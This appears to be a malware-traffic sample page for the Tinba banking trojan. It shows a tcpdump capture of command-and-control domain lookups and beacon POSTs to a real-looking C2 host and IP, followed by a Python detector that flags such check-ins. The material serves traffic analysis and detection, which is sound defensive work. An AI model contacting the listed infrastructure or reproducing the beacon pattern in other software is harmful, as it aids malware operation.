Tinba Tiny Banking Trojan Malware Traffic Sample PCAP Download

January 29, 2016

Download Tinba PCAP sample: tinba.pcap

Tinba got its name from its extraordinarily small size: its code is approximately 20 kilobytes, remarkably small for banking malware. The name is a combination of the words tiny and banker; the same malware is also known as Tinybanker and Zusy.

2012-05-09 22:14:39.253725 IP 10.0.2.15.1026 > 8.8.8.8.53: 37388+ A? dakotavolandos.com. (36)
2012-05-09 22:14:39.261738 IP 10.0.2.15.1053 > 8.8.8.8.53: 59449+ A? dakotavolandos.com. (36)
2012-05-09 22:14:39.287205 IP 8.8.8.8.53 > 10.0.2.15.1026: 37388 NXDomain 0/1/0 (109)
2012-05-09 22:14:39.287372 IP 10.0.2.15.1026 > 8.8.8.8.53: 60686+ A? dakotavolandos.com.hsd1.va.comcast.net. (56)
2012-05-09 22:14:39.287556 IP 8.8.8.8.53 > 10.0.2.15.1053: 59449 NXDomain 0/1/0 (109)
2012-05-09 22:14:39.287725 IP 10.0.2.15.1053 > 8.8.8.8.53: 28828+ A? dakotavolandos.com.hsd1.va.comcast.net. (56)
2012-05-09 22:14:39.329482 IP 8.8.8.8.53 > 10.0.2.15.1026: 60686 NXDomain 0/1/0 (136)
2012-05-09 22:14:39.330766 IP 10.0.2.15.1026 > 8.8.8.8.53: 26356+ A? dak1otavola1ndos.com. (38)
2012-05-09 22:14:39.345055 IP 8.8.8.8.53 > 10.0.2.15.1053: 28828 NXDomain 0/1/0 (136)
2012-05-09 22:14:39.346111 IP 10.0.2.15.1053 > 8.8.8.8.53: 36606+ A? dak1otavola1ndos.com. (38)
2012-05-09 22:14:39.492631 IP 8.8.8.8.53 > 10.0.2.15.1026: 26356 1/0/0 A 82.165.37.127 (54)
2012-05-09 22:14:39.493786 IP 8.8.8.8.53 > 10.0.2.15.1053: 36606 1/0/0 A 82.165.37.127 (54)
2012-05-09 22:14:39.507647 IP 10.0.2.15.1611 > 82.165.37.127.80: Flags [S], seq 708841482, win 64240, options [mss 1460,nop,nop,sackOK], length 0
2012-05-09 22:14:39.508160 IP 10.0.2.15.1612 > 82.165.37.127.80: Flags [S], seq 3598850243, win 64240, options [mss 1460,nop,nop,sackOK], length 0
2012-05-09 22:14:39.612848 IP 82.165.37.127.80 > 10.0.2.15.1611: Flags [S.], seq 64001, ack 708841483, win 65535, options [mss 1460], length 0
2012-05-09 22:14:39.612880 IP 10.0.2.15.1611 > 82.165.37.127.80: Flags [.], ack 1, win 64240, length 0
2012-05-09 22:14:39.613196 IP 10.0.2.15.1611 > 82.165.37.127.80: Flags [P.], seq 1:354, ack 1, win 64240, length 353: HTTP: POST /h/index.php HTTP/1.1
POST /h/index.php HTTP/1.1
Host: dak1otavola1ndos.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: identity
Connection: close
Content-Type: application/octet-stream
Content-Length: 13

4.`.
2012-05-09 22:14:39.613393 IP 82.165.37.127.80 > 10.0.2.15.1611: Flags [.], ack 354, win 65535, length 0
2012-05-09 22:14:39.613469 IP 10.0.2.15.1611 > 82.165.37.127.80: Flags [P.], seq 354:363, ack 1, win 64240, length 9: HTTP
2012-05-09 22:14:39.613661 IP 82.165.37.127.80 > 10.0.2.15.1611: Flags [.], ack 363, win 65535, length 0
2012-05-09 22:14:39.626564 IP 82.165.37.127.80 > 10.0.2.15.1612: Flags [S.], seq 128001, ack 3598850244, win 65535, options [mss 1460], length 0
2012-05-09 22:14:39.626589 IP 10.0.2.15.1612 > 82.165.37.127.80: Flags [.], ack 1, win 64240, length 0
2012-05-09 22:14:39.626940 IP 10.0.2.15.1612 > 82.165.37.127.80: Flags [P.], seq 1:354, ack 1, win 64240, length 353: HTTP: POST /h/index.php HTTP/1.1
POST /h/index.php HTTP/1.1
Host: dak1otavola1ndos.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: identity
Connection: close
Content-Type: application/octet-stream
Content-Length: 13

4.`.
2012-05-09 22:14:39.627155 IP 82.165.37.127.80 > 10.0.2.15.1612: Flags [.], ack 354, win 65535, length 0
2012-05-09 22:14:39.627232 IP 10.0.2.15.1612 > 82.165.37.127.80: Flags [P.], seq 354:363, ack 1, win 64240, length 9: HTTP
2012-05-09 22:14:39.627502 IP 82.165.37.127.80 > 10.0.2.15.1612: Flags [.], ack 363, win 65535, length 0
2012-05-09 22:14:39.823415 IP 82.165.37.127.80 > 10.0.2.15.1611: Flags [P.], seq 1:233, ack 363, win 65535, length 232: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Date: Mon, 04 Jun 2012 11:19:28 GMT
Server: Apache/2.2.16 (Debian)
X-Powered-By: PHP/5.3.13-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 20
Connection: close
Content-Type: text/html

tinba
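The capture above shows a sequence worth turning into a detection: the sample first asks for dakotavolandos.com (NXDomain, and the resolver's search-suffix retries fail too), then for dak1otavola1ndos.com, which resolves to 82.165.37.127, and it immediately POSTs a 13-byte application/octet-stream body to /h/index.php with Accept-Encoding: identity and Connection: close; the server answers with a 20-byte text/html body beginning "tinba". The Python below is an added example, not part of the original post or of the sample: it parses tcpdump summary lines like the ones above (the embedded lines are copied from this capture, with the raw payload lines left out) and flags a POST when at least two indicators line up. The 64-byte body threshold and the two-of-three rule are my own heuristic choices, not something the capture establishes.

```python
import re
# tcpdump summary lines copied from the capture on this page (binary payload lines omitted)
SAMPLE = """\
2012-05-09 22:14:39.253725 IP 10.0.2.15.1026 > 8.8.8.8.53: 37388+ A? dakotavolandos.com. (36)
2012-05-09 22:14:39.287205 IP 8.8.8.8.53 > 10.0.2.15.1026: 37388 NXDomain 0/1/0 (109)
2012-05-09 22:14:39.330766 IP 10.0.2.15.1026 > 8.8.8.8.53: 26356+ A? dak1otavola1ndos.com. (38)
2012-05-09 22:14:39.492631 IP 8.8.8.8.53 > 10.0.2.15.1026: 26356 1/0/0 A 82.165.37.127 (54)
2012-05-09 22:14:39.613196 IP 10.0.2.15.1611 > 82.165.37.127.80: Flags [P.], seq 1:354, ack 1, win 64240, length 353: HTTP: POST /h/index.php HTTP/1.1
Host: dak1otavola1ndos.com
Accept-Encoding: identity
Connection: close
Content-Type: application/octet-stream
Content-Length: 13
"""

def parse_capture(text):
    """One pass over tcpdump text: DNS name -> A records ([] means NXDOMAIN) and HTTP POSTs with headers."""
    pending, dns, posts, cur = {}, {}, [], None
    for line in text.splitlines():
        if cur is not None and ": " in line and not line[:4].isdigit():
            k, v = line.split(": ", 1)          # header line belonging to the current POST
            cur["headers"][k.lower()] = v
            continue
        cur = None                              # any other line ends the header block
        q = re.search(r"\.53: (\d+)\+ A\? (\S+?)\.? \(\d+\)$", line)
        a = re.search(r"\.53 > [\d.]+: (\d+) (.*)$", line)
        p = re.search(r"> ([\d.]+)\.\d+: .*HTTP: POST (\S+) HTTP/1\.[01]$", line)
        if q:                                   # query: remember the name under its transaction id
            pending[q.group(1)] = q.group(2)
        elif a and a.group(1) in pending:       # reply: pair it with the query by id
            dns[pending.pop(a.group(1))] = [] if "NXDomain" in a.group(2) else re.findall(r" A ([\d.]+)", a.group(2))
        elif p:                                 # POST summary line; its header lines follow
            posts.append(cur := {"dst": p.group(1), "path": p.group(2), "headers": {}})
    return dns, posts

def flag_beacons(text):
    """Return (host, path, reasons) for POSTs that match the check-in pattern seen in this capture."""
    dns, posts = parse_capture(text)
    failed, hits = [n for n, ips in dns.items() if not ips], []
    for post in posts:
        h, why = post["headers"], []
        if failed and post["dst"] in dns.get(h.get("host", ""), []):
            why.append("C2 host resolved only after NXDOMAIN for " + ", ".join(failed))
        if h.get("content-type") == "application/octet-stream" and int(h.get("content-length", 0)) < 64:
            why.append("tiny octet-stream POST body (%s bytes)" % h.get("content-length"))
        if h.get("accept-encoding") == "identity" and h.get("connection") == "close":
            why.append("Accept-Encoding: identity with Connection: close")
        if len(why) >= 2:                       # heuristic: two independent indicators
            hits.append((h.get("host"), post["path"], why))
    return hits
```

Running it on the full `tcpdump -tttt` text of tinba.pcap should report both POSTs (ports 1611 and 1612) against dak1otavola1ndos.com with all three reasons.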
